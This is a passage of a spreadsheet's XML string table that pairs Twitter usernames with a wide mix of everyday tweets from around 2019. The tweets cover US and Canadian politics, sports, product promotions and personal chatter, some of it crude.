    <t>@R2D2Resists @AryaKicksButt I don't pretend to know the rules here but if your god isn't happier that you took some action against Trump instead of not taking action against Trump then he's not the boss of anyplace I want to go when I'm deceased</t>
  </si>
  <si>
    <t>CodeMonkeyB</t>
  </si>
  <si>
    <t>@NEWS1130 @laurby Captive audience. When the alternative is whatever local cab companies wanna charge. Yes. It’s worth it. That’s the fundamental reason ride apps have thrived: no one anywhere was being well served by taxi/livery in any market. It’s all a scam. Not that it still isn’t.</t>
  </si>
  <si>
    <t>YEMolly</t>
  </si>
  <si>
    <t>@j5thefarmer That would actually be a cute dog and probably superior.</t>
  </si>
  <si>
    <t>elliottbaseball</t>
  </si>
  <si>
    <t>When CC Sabathia pitched for Milwaukee in 2008 his agent would phone Brewer executives to complain about his soon-to-be-FA pitching on short rest. They'd go into the clubhouse and Sabathia would volunteer again go on short rest #BigManBigHeart @Yankees @Brewers</t>
  </si>
  <si>
    <t>emily4foor</t>
  </si>
  <si>
    <t>lmao I get high at the worst times 😅</t>
  </si>
  <si>
    <t>AuroraBirdialis</t>
  </si>
  <si>
    <t>When you tell the children "please put new trash bags in the trashcans" and they DO but... https://t.co/Sy1Os3K7iZ</t>
  </si>
  <si>
    <t>Official_Ogz</t>
  </si>
  <si>
    <t>@KrasiFIFA In 2months u could probably grind towards a better striker imo 😅 I'm going for Guardiola and Baby Rio</t>
  </si>
  <si>
    <t>certifiedcomics</t>
  </si>
  <si>
    <t>Just published on the @comictom101 blog→ Epd.32 Buy or Pass On New Comic Book Day https://t.co/vxRIqsATxm</t>
  </si>
  <si>
    <t>noswag_JLoden</t>
  </si>
  <si>
    <t>Obviously some things fell flat for me, but overall I found myself enjoying the hell out of this little 90 minute feature. Devine is awkwardly charming and turns in one of his best performances. The chemistry between both him and Shipp is one of the best of the year.</t>
  </si>
  <si>
    <t>LoriLeszczynski</t>
  </si>
  <si>
    <t>@ChuckCallesto I never watched him. Just turned the channel.</t>
  </si>
  <si>
    <t>BzanneGiudice</t>
  </si>
  <si>
    <t>@Liz_Cheney What are YOU going to do about it?!</t>
  </si>
  <si>
    <t>MariaCa47811062</t>
  </si>
  <si>
    <t>@AndyOstroy @RudyGiuliani @realDonaldTrump LOOOOOOVE IT! Like I died and went to heaven!</t>
  </si>
  <si>
    <t>PoshConsign_WA</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: Maxchic Long-Sleeve Ribbed Dress, Size M. https://t.co/Vzjzwmm78P via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>lynda1225</t>
  </si>
  <si>
    <t>@bendreyfuss Absolutely! I am always amazed at how inventive and clever people can be. And I learn a lot about law.</t>
  </si>
  <si>
    <t>Lothaletrom67</t>
  </si>
  <si>
    <t>@TerreB2020 Thanks For The Follow. 😀</t>
  </si>
  <si>
    <t>inforum</t>
  </si>
  <si>
    <t>Mayo Clinic plans to upgrade subway tunnels, public areas https://t.co/6aMe0FgJ2I</t>
  </si>
  <si>
    <t>gcgarvey</t>
  </si>
  <si>
    <t>@SeanStanglandDH “Costume design is just a cheap, manipulative trick intended to make you think the actors are actually the characters they’re portraying.”</t>
  </si>
  <si>
    <t>SonikuRaharu</t>
  </si>
  <si>
    <t>@Jack2Tweeter @Nintendrew_ The handheld screen resolution is literally unchanged. Because it's lighter, you can offset the size by holding it closer - and do so more comfortably. Or refrain from adjusting distance and gain better perceived "sharpness".</t>
  </si>
  <si>
    <t>JamieLutzi1</t>
  </si>
  <si>
    <t>Bulk Office Supplies For All Home Offices &amp; Commercial Entities - Reduce Prices! https://t.co/spGyhooBuP</t>
  </si>
  <si>
    <t>rutty4</t>
  </si>
  <si>
    <t>@PaulRutt I am sure @noah_rh02 would love to do this 😂😂😂</t>
  </si>
  <si>
    <t>kataxon</t>
  </si>
  <si>
    <t>Three from the pack of 8 had developer issues. The other five were fine. I am sad. https://t.co/rHZDXNlEv1</t>
  </si>
  <si>
    <t>KentuckyKroge</t>
  </si>
  <si>
    <t>@DavidFurones_ Manny seems just about as confident as Williams did choosing to enter the portal, Jarren will do it again at the end of the season</t>
  </si>
  <si>
    <t>1rgmx</t>
  </si>
  <si>
    <t>Bro it’s 2 am. I am hella drunk and my brother got me cooking beans for him</t>
  </si>
  <si>
    <t>ZDNet</t>
  </si>
  <si>
    <t>Nurse robot set to make the rounds at major hospitals https://t.co/pjXZeti9jH</t>
  </si>
  <si>
    <t>Eleywoman1</t>
  </si>
  <si>
    <t>@RealEmirHan Heath 🥰 was amazing and Fun in a twisted way for ever he will be know 🤡🙌. Joaquin was unidentifiable his method to embark in the darkness of mental illness was Intensive. Phoenix film was mostly taken in one shot. His transformation &amp; dedication to it, is undeniable 🏆</t>
  </si>
  <si>
    <t>RevereBank</t>
  </si>
  <si>
    <t>Revere will be closed on Monday, October 14 in honor of Columbus Day. Our online and mobile banking services and the ATM network will still be available 24/7. https://t.co/IF9GJ0LnH9</t>
  </si>
  <si>
    <t>TerriSinnn</t>
  </si>
  <si>
    <t>Read Online Hood Kings Of The South: A Complete Novel -&gt; https://t.co/SD0hiBBzpI</t>
  </si>
  <si>
    <t>xxHalosapienxx</t>
  </si>
  <si>
    <t>@KauyonGaming During an interview, a professional Chinese Hearthstone player made a statement siding in favor of the recent protests in Hong Kong. Activision/Blizzard cuts ties with him (and the guys who interviewed him) and also stopped payments of his Hearthstone winnings.</t>
  </si>
  <si>
    <t>MantachieSports</t>
  </si>
  <si>
    <t>The Urchins strike first with a 4-yard run and the PAT is good. East Union 7, Mantachie 0</t>
  </si>
  <si>
    <t>wendywrocks</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: 1 By 0'2nd Erica Knit Pencil Skirt. https://t.co/GFR9e5yQpu via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>nchute</t>
  </si>
  <si>
    <t>There are differences between Markel's ex-wife's testimony and her ex-boyfriend's https://t.co/IJAwCQgl3s</t>
  </si>
  <si>
    <t>MehKoiter</t>
  </si>
  <si>
    <t>@anniefuchsia Hey Annie! What's a good way for someone to get involved in video games outside of being just consumer?</t>
  </si>
  <si>
    <t>N1electricab</t>
  </si>
  <si>
    <t>@eTaxiCharging @LondonEVCompany It’s really useful when cleaning the windows when you have the rain guards fitted, otherwise you have to keep going round to the drivers side.on a £60 k vehicle it seems a bit penny pinching?</t>
  </si>
  <si>
    <t>srhollands1</t>
  </si>
  <si>
    <t>@photosbykieran @LindseyStirling Agreed. Although I love her other albums, I've always said her first one was definitely the best and she'd have to do something really special to beat it. She has. #Artemis is just amazing. Some really beautiful music on there. Lindsey Stirling - I salute you. And thank you...</t>
  </si>
  <si>
    <t>BeautyLoverUK</t>
  </si>
  <si>
    <t>@jackofspadesky @nerds_muscle You look totally awesome and dominant 😍</t>
  </si>
  <si>
    <t>lisastewart59</t>
  </si>
  <si>
    <t>@no_silenced AMEN TO THAT !!!</t>
  </si>
  <si>
    <t>baffinworldwide</t>
  </si>
  <si>
    <t>Planning some time outside this weekend? Let baffin protect and comfort you and your family - https://t.co/CLVOJ0SYur</t>
  </si>
  <si>
    <t>Pinkbeachhut</t>
  </si>
  <si>
    <t>Ukraine and China. #BidenCorruption #obamacorruption #maga @realDonaldTrump expose the all!! https://t.co/0PbWpkQyTj</t>
  </si>
  <si>
    <t>JDeWPerry</t>
  </si>
  <si>
    <t>@realDonaldTrump This *would* be big stuff ... if it mattered to the impeachment investigation. At all. The whistleblower's credibility isn't at issue right now, and may never be again. The facts depend on other witnesses and documents, not her personal knowledge or credibility.</t>
  </si>
  <si>
    <t>sirarronpaul</t>
  </si>
  <si>
    <t>@alexyz_03 Yeah she’s foreal trippin. Them fuckin kids around the tent scene made me shit my pants lol</t>
  </si>
  <si>
    <t>Snowyattic1</t>
  </si>
  <si>
    <t>@JohnFGalt @DEFCONWSALERTS And i'm sure that the DefCon warning system does not care.</t>
  </si>
  <si>
    <t>TheNashDashShow</t>
  </si>
  <si>
    <t>This stage of my life has to be entitled: DEALING WITH DUMB SHIT!</t>
  </si>
  <si>
    <t>atay10r_</t>
  </si>
  <si>
    <t>the prettiest bitch 👄 https://t.co/NOtO4JtmYi</t>
  </si>
  <si>
    <t>spikephoto</t>
  </si>
  <si>
    <t>@lusardiofficial Beauty and the Beast!</t>
  </si>
  <si>
    <t>Alaska_Braces</t>
  </si>
  <si>
    <t>We believe that everyone deserves a beautiful #smile. That’s why we offer flexible payment plans, so that everyone can enjoy the benefits of having an affordable orthodontist! https://t.co/oQbHt7lEXR https://t.co/bJ8u3I1Uxd</t>
  </si>
  <si>
    <t>gdgollymisholly</t>
  </si>
  <si>
    <t>@freedomsupport happy international podcast day? As today is ORANGE SHIRT DAY! Every child matters!! Today is to promote awareness about the Residential Schools &amp; the impact this had on Indigenous communities for more than a century in Canada, and still does today!</t>
  </si>
  <si>
    <t>beth__ellen</t>
  </si>
  <si>
    <t>we all need to be more hedonistic. eat chocolate cake while in the bath. buy impossibly soft socks to wear all the time. invest in that super comfy pillow. eat grapes in your underwear while watching youtube videos. ENJOY LIFE'S PLEASURES YALL WE'RE ONLY HERE FOR A SHORT ASS TIME</t>
  </si>
  <si>
    <t>cowboysRasta</t>
  </si>
  <si>
    <t>These MF’s let Aaron Jones put up 4tds on them today ... I’m so Fu$&amp;/)/?&amp;@&amp;/):&amp;@@“”-&amp;/)/(,,/###&lt;&lt;*+%##^*+= MAD 😡</t>
  </si>
  <si>
    <t>gabrielughh</t>
  </si>
  <si>
    <t>how can i slip if im the one doing the moppin’</t>
  </si>
  <si>
    <t>Ziggyfin</t>
  </si>
  <si>
    <t>@whhhimp Ah, yes! The original is so good!!</t>
  </si>
  <si>
    <t>chantel_malin</t>
  </si>
  <si>
    <t>@undrunke Does he realize that there is an INCREDIBLY simple solution to this problem</t>
  </si>
  <si>
    <t>siv_brth</t>
  </si>
  <si>
    <t>@SteveShores4 @CNN yeah cause this is a climate change issue. FFS not everything is climate change - and by, humanity will be wiped of the earth long before the galaxies collide.</t>
  </si>
  <si>
    <t>loveusa2018</t>
  </si>
  <si>
    <t>@bennyjohnson @LindseyGrahamSC @DonaldJTrumpJr @LindseyGrahamSC promised an inquiry as to how the Russia Hoax got started. In two years he’s not done one damn thing towards that. Our Republican leadership need to stop talking &amp; get to work. The bullies are running us over &amp; most Republicans are sitting in their easy chairs!</t>
  </si>
  <si>
    <t>_NYMaya_</t>
  </si>
  <si>
    <t>@mtlgazette Andrew Scheer is my age and has never held a real job. He’s not even remotely qualified.</t>
  </si>
  <si>
    <t>MrQs_News</t>
  </si>
  <si>
    <t>@virginmedia No - Spent 45 minutes on the phone with cust Svc doing all the *tecnical* stuff to no avail. As advised 3 people in same location with same issue - this is not a coincidence</t>
  </si>
  <si>
    <t>BeninBiloxi</t>
  </si>
  <si>
    <t>@GGforthepeople @WolvesforKamala @lindzlizbeth @dire_wolves @FF_fanster @SoFearMe @return_carriage @saradani @pissyrabbit @TiredInOR4Now @Needle_of_Arya @WillieEverstop @dollopojjam @Rennibeth13 @PeachyKnitter62 @Ludovicleroi @DavidofSeattle @1CubbieKat1 @PettyLupone @SethPalooka @Ndreajess @DailyLibber @Mattscharfstein @ThunderHeadFan @LeifNanna @CpRiskman @bbowers73 @Rosiecvec @ericclee1 @Emilinalala @Like_H2O @michellem @ReginaA1981 @PrezHillary17 @notaxationwore1 @mollylyons @NimueforKamala @matryoskadoll @morganarae @Drivebythinker @Kristina_Why @AnnAnnChe @SallyChange @binksnboo @daralynn13 @BravelyWriting @NotThisAsshole1 @earlgreyhottea @doctor_eon @emiranda_writes “I don’t read fiction” *brushes tweed jacket* “Fun is for lessers.”</t>
  </si>
  <si>
    <t>kariokart</t>
  </si>
  <si>
    <t>I've lost....almost 40 pounds......in like 8 months..........all because of my anxiety :/ I'm going through it man I really need to slow down</t>
  </si>
  <si>
    <t>chawkjr7</t>
  </si>
  <si>
    <t>@Charlie_Burris Here’s a thought: How about we keep sports and politics separate since you know...it’s just better that way. https://t.co/r2TYvTvGus</t>
  </si>
  <si>
    <t>DaddyLev</t>
  </si>
  <si>
    <t>@ight_ese @SlightlyBlind @HarbingerOfTime @Jillybean0577 @SuzannahPearce Ok? So you're saying there are no humans left in the world that are so poor they need to scavenge to survive? https://t.co/0LpAZLAmVn</t>
  </si>
  <si>
    <t>Propayangda</t>
  </si>
  <si>
    <t>@thehill what an important milestone in the history of politics https://t.co/1GEvHkVAVN</t>
  </si>
  <si>
    <t>jrwebber16</t>
  </si>
  <si>
    <t>@joncoopertweets @realDonaldTrump Sucking his thumb and stroking his micro- mushroom.</t>
  </si>
  <si>
    <t>BartsPete</t>
  </si>
  <si>
    <t>@TurkishFacts4U @MattScript @Channel4News @WashingtonPoint @FactCheck Were these protestors beaten up by UK security? https://t.co/NEEZj6ayyJ</t>
  </si>
  <si>
    <t>rdaigz89</t>
  </si>
  <si>
    <t>@TheRealTayRoc Thats keepin it a milly, despite the bs</t>
  </si>
  <si>
    <t>Terryd515</t>
  </si>
  <si>
    <t>@_bradymcbride_ Sorry to hear that!!!</t>
  </si>
  <si>
    <t>Romney's Biden-Ukraine Connection Slips Out - His Opposition To Trump Could Come Crashing Down https://t.co/V6DWgT3RuJ</t>
  </si>
  <si>
    <t>gholmen77</t>
  </si>
  <si>
    <t>@Mama_O_G @DrStevenGreer I have and I do... I’ve watched it several times and my wife got me the book. It’s such an eye opener!</t>
  </si>
  <si>
    <t>raven_mcampbell</t>
  </si>
  <si>
    <t>@cstefan206 @Sailor_Mairi and even though strategies have changed, that still taints the concept?</t>
  </si>
  <si>
    <t>Three_Is_Broken</t>
  </si>
  <si>
    <t>@billgreenwood @ThreeUK @ThreeUKSupport Yup. We get what we pay for!</t>
  </si>
  <si>
    <t>pdwiel</t>
  </si>
  <si>
    <t>Persephone Greek Statue Goddess Queen of the Underworld 13" Saltstone https://t.co/J6s3p6e4pJ https://t.co/sYJbM6m7Ks</t>
  </si>
  <si>
    <t>thekantastic</t>
  </si>
  <si>
    <t>I guess that's why they call him Fife The Knife @RobertFife @globeandmail #petermackay #elxn19 #CanadaDebates2019 #FrenchDebate #cdnpoli</t>
  </si>
  <si>
    <t>jimmyalustig</t>
  </si>
  <si>
    <t>How to Encourage your Employees to #volunteer https://t.co/5akSrSBxw3 https://t.co/XKxf1I3mzg</t>
  </si>
  <si>
    <t>CayenneAmor</t>
  </si>
  <si>
    <t>When make photgraphers slide in my DMs saying “let’s shoot” it always means “let me fuck for free in exchange for my mediocre service I initially offered to you for free”</t>
  </si>
  <si>
    <t>_buzor</t>
  </si>
  <si>
    <t>Hate the fake convo’s that come before people ask for a favour 🥴</t>
  </si>
  <si>
    <t>The_Master_Yeti</t>
  </si>
  <si>
    <t>@_PatrioticDad How's your ban on facebook going? I'm back on here for now. I'm sure they'll find a way to get us all on all the platforms. This is my favorite meme about the #climatehoax #climatebrawl #ClimateEmergency #NoEmergency https://t.co/HJQ3rjDg1r</t>
  </si>
  <si>
    <t>Quato2</t>
  </si>
  <si>
    <t>@JackPosobiec The only solution is to raise it higher</t>
  </si>
  <si>
    <t>serenelyjoyful</t>
  </si>
  <si>
    <t>@sjk_42 @britain_elects @YouGov the poll</t>
  </si>
  <si>
    <t>Myrajayjenni</t>
  </si>
  <si>
    <t>@illwillie_ LMAOOOOOOOOOO see the girl just gotta be bold and say it</t>
  </si>
  <si>
    <t>hesvelvety</t>
  </si>
  <si>
    <t>@lifeofalouie I LOVE YOU always and always and always. Xx</t>
  </si>
  <si>
    <t>pifwitdabagg</t>
  </si>
  <si>
    <t>@Plum1Realone I’m trying to see too 👀😂😂</t>
  </si>
  <si>
    <t>VicarOfDishley</t>
  </si>
  <si>
    <t>@theabingdontaxi It’s wonderful isn’t it? One of our RC chaplains has been invited there, I’m so pleased for him. Enjoy every minute. X</t>
  </si>
  <si>
    <t>Ninjalina</t>
  </si>
  <si>
    <t>Pretty stoked about this. Anyone wanna go and dance w John Smith Cyclone fwends? Holla https://t.co/sChKmMFsWr</t>
  </si>
  <si>
    <t>Tobymare</t>
  </si>
  <si>
    <t>@51mystic @BerryDivine77 @EyesOnQ I thought abt that too, maybe Tom doesn’t want to have any discrepancies in his writing due to the haters. They’re so bad they’d do anything to lessen his credibility. It looks odd to me for him to put A in W in his tweet, I don’t get the correlation. I could read the book again.</t>
  </si>
  <si>
    <t>King__Jay26</t>
  </si>
  <si>
    <t>I’m tired asf I wish braiden go to sleep 🥴</t>
  </si>
  <si>
    <t>SurfNews365</t>
  </si>
  <si>
    <t>#surf wsl: .toledo_filipe breaks down what it's like to surf against a close friend in regards to the Roxy Pro Semifinal superheat coming up with LakeyPeterson and rissmoore10. Next call for the #QuikPro #RoxyPro is Friday, Oct 11 at 8:30 am CET (3:30am … https://t.co/viRt16TxRP</t>
  </si>
  <si>
    <t>EvilDeadTed</t>
  </si>
  <si>
    <t>@StephenAmell You need to not leave the universe</t>
  </si>
  <si>
    <t>comicalsneakers</t>
  </si>
  <si>
    <t>@misterfriday I saw your tweet and I was like DANG. @chiaczar and I just have to come back up soon!</t>
  </si>
  <si>
    <t>luffgraham89</t>
  </si>
  <si>
    <t>@tinabobuk None of those lefties called him out for cultural appropriation for those dreads yet?</t>
  </si>
  <si>
    <t>adyd321</t>
  </si>
  <si>
    <t>@stanners_1982 Not if you dont want one. I doubt they will go begging. If wasnt on holiday in egypt i would pay for one</t>
  </si>
  <si>
    <t>BakerAyla</t>
  </si>
  <si>
    <t>EBOOK Free Memory. Train Your Brain.: The Complete Guide on How to Improve Your Memory, Think Faster, Concentrate More and Remember Everything =&gt; https://t.co/2Y0h7mh11h</t>
  </si>
  <si>
    <t>MakaylaNoland1</t>
  </si>
  <si>
    <t>Best part about baby sitting older kids is I can nap and get paid</t>
  </si>
  <si>
    <t>mattsroberts90</t>
  </si>
  <si>
    <t>And the time countdown begins #GeneralConference 😁 https://t.co/3ipqfu6toL</t>
  </si>
  <si>
    <t>iamreneejai</t>
  </si>
  <si>
    <t>Shoutout to @SandiPattyP and @KathieLGifford for getting me through today’s workday. #iReesy</t>
  </si>
  <si>
    <t>ZaddyZamZam</t>
  </si>
  <si>
    <t>A gc but for music 🤯</t>
  </si>
  <si>
    <t>CovingtonMayor</t>
  </si>
  <si>
    <t>The dollars you spend here actually do stay here! #shoplocal and keep your spending money here so we can further invest in our city and county! https://t.co/CkzJvN9WzI</t>
  </si>
  <si>
    <t>__KILLAqueen</t>
  </si>
  <si>
    <t>Can someone PLEASE bring me a jacket to my job</t>
  </si>
  <si>
    <t>DGPentz</t>
  </si>
  <si>
    <t>@MagusDeluxe @cushbomb Drunkest cities in the US, yay?</t>
  </si>
  <si>
    <t>QueenQua86</t>
  </si>
  <si>
    <t>The best 3mos of the year OCTOBER=🎃 NOVEMBER =🦃 DECEMBER =🎄</t>
  </si>
  <si>
    <t>TFS_Wolves</t>
  </si>
  <si>
    <t>Wolves are the number one trend in Portugal right now. Number 2 Raul Jimenez. This, on the day that Portugal are currently… https://t.co/EhosstzGwz</t>
  </si>
  <si>
    <t>GCustom</t>
  </si>
  <si>
    <t>@JoeLoganTalley @RTimeWillTell2 @Mister_Woodo @PyramidHead76 @SwiftOnSecurity False flags and disinformation are everywhere lately, they aren't fighting fair, they've stopped compromising where they used to, we've got foreign influence, it ramped up around them but wasn't exclusively them. They're out of the spotlight and the friction remains</t>
  </si>
  <si>
    <t>alicine13</t>
  </si>
  <si>
    <t>@CarmineSabia @fred_guttenberg @SenRonJohnson @MeetThePress The point is this was the 4th of July.. also what about his planned secret meeting at Camp David the day before 9/11 with the Saudis when the ones who attacked us were Saudis!</t>
  </si>
  <si>
    <t>cutesope</t>
  </si>
  <si>
    <t>Just spent over 2 hours with my flatmates listening to all the Harry Potter film scores and making a game out of guessing which film and what scene each song was from</t>
  </si>
  <si>
    <t>ilovgirls5</t>
  </si>
  <si>
    <t>Sometimes being grateful and appreciative isn't enough..idk what you gotta do but you better figure it out b4 it's too late &amp; you have to 3r3r2LUKQQ1</t>
  </si>
  <si>
    <t>twinchicken_pdx</t>
  </si>
  <si>
    <t>BEER: https://t.co/j2RmjgwKf4 SODA: https://t.co/Bpxa5d1Y1U THE</t>
  </si>
  <si>
    <t>maxleibman</t>
  </si>
  <si>
    <t>If you loudly proclaim or ask something to no one in particular as you approach the bus stop, I am not going to respond. I will not even acknowledge you. The bus stop is not your stage. I am not your audience.</t>
  </si>
  <si>
    <t>__niimo21</t>
  </si>
  <si>
    <t>If you follow me and don’t wash your legs and feet when you shower pls unfollow me. Behind your ears and neck too.</t>
  </si>
  <si>
    <t>mjwutaylor</t>
  </si>
  <si>
    <t>@BCassellius is playing with kids and exploring shapes. #bpsproud #bps https://t.co/dgKQkewMRZ</t>
  </si>
  <si>
    <t>josieraider</t>
  </si>
  <si>
    <t>@ZyBurton83 good to hear ❤❤❤❤❤</t>
  </si>
  <si>
    <t>Lizzabiza</t>
  </si>
  <si>
    <t>@Davidius_Rex @yashar I fired a guy for calling me "hon."</t>
  </si>
  <si>
    <t>JaiShri69992511</t>
  </si>
  <si>
    <t>@SecPompeo @NATO Notice Erdogan is now moving troops into north Syria claiming USA failed to establish a buffer. Pompeo cut me off from Erdogan so he can now solve the problem himself, personally. Why Harvard graduate so many “geniuses” who are downright lame? @realDonaldTrump @mike_pence</t>
  </si>
  <si>
    <t>bsturmny</t>
  </si>
  <si>
    <t>@Justme10000000 Think it’s all about his long history of crimes and need to undermine law enforcement, press to protect himself. Other part is he simply has always been reckless and his celebrity, legal threats worked to protect him.</t>
  </si>
  <si>
    <t>ShearerCandles</t>
  </si>
  <si>
    <t>Introducing our new range of Alphabet Candles! For sale exclusively on our website &amp; in our Glasgow stores! Priced individually at £2.50 each, or buy any 3 for £6. https://t.co/EUc8mnxsps https://t.co/Lj3gtKOThO</t>
  </si>
  <si>
    <t>myst575</t>
  </si>
  <si>
    <t>@RetroCR hi! I was wondering when the PC version was going to get Mac support? 🖥 💻</t>
  </si>
  <si>
    <t>PhillyJonah</t>
  </si>
  <si>
    <t>@DurkGrinds No.. Blake has proven himself more in the league and is also a 6x All Star.</t>
  </si>
  <si>
    <t>ChowehChow</t>
  </si>
  <si>
    <t>My new job has been nice, bosses are nice, co workers are nice. Now I just need to get comfortable in working at a new job. 🤪</t>
  </si>
  <si>
    <t>PawnshopDieter</t>
  </si>
  <si>
    <t>Avon Fancy Feet Double Action Brush And Callous Foot File NOS #Avon https://t.co/TLxxoDrlfM</t>
  </si>
  <si>
    <t>HSHToria</t>
  </si>
  <si>
    <t>That’s green challenger mama had in the video was clean. I’d get one.</t>
  </si>
  <si>
    <t>Pink_Moosecato</t>
  </si>
  <si>
    <t>@jamieislame @HotPalestineDad One of the first rock songs I learned the words to solely because of this bar</t>
  </si>
  <si>
    <t>boricuawanda</t>
  </si>
  <si>
    <t>I’m so picky when it comes to finding a boo😪</t>
  </si>
  <si>
    <t>tracysaur</t>
  </si>
  <si>
    <t>@AdamBarnello I'm Canadian, so it's CPU which is IPF! CPU is pretty inclusive so I'm happy to compete with them.</t>
  </si>
  <si>
    <t>alexsreputation</t>
  </si>
  <si>
    <t>@unsaidgsgs i can’t go to the liverpool show coz my mum is I’ll</t>
  </si>
  <si>
    <t>theyackerr</t>
  </si>
  <si>
    <t>What’s with him being a Bengali taking precedence over him being an Indian ...maybe we were always so regional and I’m only noticing it now? #AbhijitBanerjee #ohwell</t>
  </si>
  <si>
    <t>Area51Virtuoso</t>
  </si>
  <si>
    <t>Malwarebytes: Malwarebytes discovered a link between Magecart Group 4 and Cobalt Group. kellymsheridan via DarkReading https://t.co/TQYMa2ucQx</t>
  </si>
  <si>
    <t>madisonbatts</t>
  </si>
  <si>
    <t>It's interesting to hear other #Republicans talk about what Pubs really think. My fav: "@GOPLeader Kevin McCarthy is not the brightest bulb in the bunch" 💡 Heard on @donlemon tonight. ITA and he proves it every time he speaks! 😁</t>
  </si>
  <si>
    <t>ColinMimnagh</t>
  </si>
  <si>
    <t>@pkelly3 If we leave now we will get in at halftime for nothing</t>
  </si>
  <si>
    <t>RUwhim</t>
  </si>
  <si>
    <t>Happy Monday Followers👋 Just a Heads up! We are reformatting Castle of Crows and Child of Starlight to be much easier to read and Follow. Go check out the new format on our website https://t.co/IFZotQ4K9L Happy reading!😉 https://t.co/lsMWKtJrxP</t>
  </si>
  <si>
    <t>Zollers95</t>
  </si>
  <si>
    <t>I’m now live come and join in the fun https://t.co/x7xmWuNKTr #twitch #streaming #twitchstreamer #minecraft https://t.co/Lz2ogah1bo</t>
  </si>
  <si>
    <t>fcfacanada</t>
  </si>
  <si>
    <t>Hey @CBCNews and @chrishallcbc - @tvanouvelles actually broadcasts across Canada so tonight's debate not watched just by Quebecers, but also by 2.7 million Francophones elsewhere. https://t.co/gTGBy7i3N4 #cdnpoli #faceàfacetva</t>
  </si>
  <si>
    <t>alholmtoday</t>
  </si>
  <si>
    <t>Parasite (2019) - I’d call Joon-ho Bong a genre neorealist, like if you combined Guillermo Del Toro and Mike Leigh. I don’t want to give too much away so I can’t say what genre this is wearing, but suffice to say the family and class elements are very very good. Awesome movie! https://t.co/KuvbT3aMeV</t>
  </si>
  <si>
    <t>DJHPlaysFM</t>
  </si>
  <si>
    <t>@ryanoconnor12 @docklanders Tbf I think this year you can build a pretty good team without it being chore. Ok so I have bought £28 worth of fifa points but that is all and have a 183 squad and a 181 team with 140k to spare. SBCs are a lifesaver and the new objectives are really helpful.</t>
  </si>
  <si>
    <t>playtherapypup</t>
  </si>
  <si>
    <t>@GOP Lots of bills passed. Sitting on the desk of Mitch McConnell.</t>
  </si>
  <si>
    <t>XxPsYkOSnIpEzxX</t>
  </si>
  <si>
    <t>Check out my broadcast from my PlayStation 4! #PS4live (Borderlands: The Handsome Collection) live at https://t.co/ovOCBSVbQY</t>
  </si>
  <si>
    <t>brian19694</t>
  </si>
  <si>
    <t>@ed_solomon @epilepticbear It would b ok with me to go back to the 60's since I'm from the 60's.</t>
  </si>
  <si>
    <t>FUCTUPMIGUEL</t>
  </si>
  <si>
    <t>@DianeAdair11 @JoeBiden @SpeakerPelosi @RepAdamSchiff You need to see a mental health professional, In the meantime please stay away from children as you're seriously ill.</t>
  </si>
  <si>
    <t>joepal821</t>
  </si>
  <si>
    <t>Should anyone question Schumer about his "six ways to sunday threat " espically, since five have already failed, what exactly is that sixth way? I fear some are no longer with us because of that "sixth way".</t>
  </si>
  <si>
    <t>AClarkeEditori1</t>
  </si>
  <si>
    <t>3 of 5 stars to The Testaments by Margaret Atwood https://t.co/Baeh9Pjsh1</t>
  </si>
  <si>
    <t>GrahamWatkins</t>
  </si>
  <si>
    <t>Last year we launched the #BlueTechChallenge to identify business models for sustainability of the #oceaneconomy in the #Caribbean 🌊. One of the selected proposals came to fruition in #Haiti 🇭🇹. Learn more about this new project. https://t.co/N21TraSlPX https://t.co/N21TraSlPX</t>
  </si>
  <si>
    <t>petemitchell42</t>
  </si>
  <si>
    <t>@Rebelsboys_ no it’s definitely cyberbullying, you’re trying to make me delete this tweet and i’m never gonna take it down</t>
  </si>
  <si>
    <t>RKTrialTeam</t>
  </si>
  <si>
    <t>Interested in insurance defense? Check out some of our case results to learn more! #lawpractice #drivenbyresults #TampaBay #insurance https://t.co/oPFhj7R1au https://t.co/j9iTkaiMrn</t>
  </si>
  <si>
    <t>SKAerials</t>
  </si>
  <si>
    <t>@theSNP @IanBlackfordMP And if Broken Britain refuses permission, what then?</t>
  </si>
  <si>
    <t>KevCoke6</t>
  </si>
  <si>
    <t>@requestGranted They might "part ways". Pittsburgh is headed towards a rebuild and Mike Tomlin deserves better than that. Better for his legacy to get canned or "walk away" now.</t>
  </si>
  <si>
    <t>Tennessee_Daddy</t>
  </si>
  <si>
    <t>@Georgia_VOL I have a very fond opinion of my little dick....thank you very much. He has been with me through it all. And damn I have put him in some fucked up situations.</t>
  </si>
  <si>
    <t>Exqu1siteCorpse</t>
  </si>
  <si>
    <t>@MWUnicorn I would like to be a swan who bites people.</t>
  </si>
  <si>
    <t>lhetz</t>
  </si>
  <si>
    <t>@DogginTrump Nope. Hope he rots in hell along with all those that continue to support his corrupt idiotic ass.</t>
  </si>
  <si>
    <t>ZyTheGEMiNi</t>
  </si>
  <si>
    <t>@JLowwee Stretch you out and nobody else for me</t>
  </si>
  <si>
    <t>Dane83Jackson</t>
  </si>
  <si>
    <t>@BobbyBeltTX is La’ell in danger of missing Sunday? Or is this more to rest his back?</t>
  </si>
  <si>
    <t>AMBSINY</t>
  </si>
  <si>
    <t>@thehill What about family members of presidents? Should they get things, like, say Chinese trademarks and patents and such? How about real estate deals with murderous Saudi dictators? Or crazy Turkish dictators?</t>
  </si>
  <si>
    <t>haemolysis</t>
  </si>
  <si>
    <t>Noah fence but I popped a tiny pimple on my NIPPLE. Do you know how painful and unusual that is. Wild.</t>
  </si>
  <si>
    <t>Lesamac61</t>
  </si>
  <si>
    <t>When Will Thailand Put Ban the Cruel Captive Tiger Industry? #care2 https://t.co/iCxXeBIwb6</t>
  </si>
  <si>
    <t>de_anarky</t>
  </si>
  <si>
    <t>Why are we surprised with the poor care from corporate providers? They are mandated by law to ensure profit is the first priority over all else #QandA</t>
  </si>
  <si>
    <t>Tamehnter</t>
  </si>
  <si>
    <t>Ivanka showed up to cut the ribbon at the new American based Louis Vuitton plant ... clutching a Chanel bag hahahahaha 😂🤦‍♀️</t>
  </si>
  <si>
    <t>JewelDole</t>
  </si>
  <si>
    <t>@Resisterennoir @lew_dog17 @HRC ✅As a writer I tend to use neutral as well as the sexed pronouns, but as needed creatively, or for clarity. If I use someone's name, I generally follow w/the neutrals after that. There's no need to sex them because: unless the subject states it, neither writer nor readers know.</t>
  </si>
  <si>
    <t>GottaAskKay</t>
  </si>
  <si>
